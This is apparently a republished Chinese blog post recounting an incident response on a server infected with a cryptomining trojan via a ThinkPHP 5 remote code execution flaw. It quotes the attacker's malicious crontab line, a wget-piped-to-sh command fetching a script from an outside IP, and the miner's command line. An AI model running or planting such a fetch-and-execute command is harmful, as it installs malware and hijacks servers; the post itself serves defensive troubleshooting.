掛馬清除經歷:處理一個利用thinkphp5遠程代碼執行漏洞挖礦的木馬

下面由thinkphp教程欄目給大家介紹處理一個利用thinkphp5遠程代碼執行漏洞挖礦的木馬的方法,希望對需要的朋友有所幫助!

掛馬清除經歷:處理一個利用thinkphp5遠程代碼執行漏洞挖礦的木馬

記一次掛馬清除經歷:處理一個利用thinkphp5遠程代碼執行漏洞挖礦的木馬

昨天發現 一臺服務器突然慢了 top 顯示 幾個進程100%以上的cpu使用

執行命令為 :

立即學習PHP免費學習筆記(深入)”;

/tmp/php??-s?/tmp/p2.conf

基本可以確定是被掛馬了

下一步確定來源

last 沒有登陸記錄

先干掉這幾個進程,但是幾分鐘之后又出現了

先看看這個木馬想干什么吧

netstat 看到 這個木馬開啟了一個端口和國外的某個ip建立了連接

但是tcpdump了一小會兒 沒有發現任何數據傳遞

這他是想干啥?

繼續查看日志吧

在cron日志中發現了www用戶 有一個crontab定時操作 基本就是這個問題了

wget?-q?-O?-?http://83.220.169.247/cr3.sh?|?sh?>?/dev/null?2>&1

順著下載了幾個問題,看了看 應該是個挖礦的木馬程序

服務器上的www用戶 是安裝 lnmp 創建的,看了來源很可能就是web漏洞了。

再看/tmp下的php的權限 就是www的

查看 lnmp下幾個站的日志 ?發現是利用 thinkphp 5最近爆出的遠程代碼執行漏洞

漏洞細節:https://nosec.org/home/detail/2050.html

修復一下問題解決

但是 這個站點是測試站點 ?端口監聽的是 8083 ?,難道現在黑客能開始嗅探非常規端口了?

來源:https://www.simapple.com/425.html

相關推薦:最新的10個thinkphp視頻教程

? 版權聲明
THE END
喜歡就支持一下吧
點贊7 分享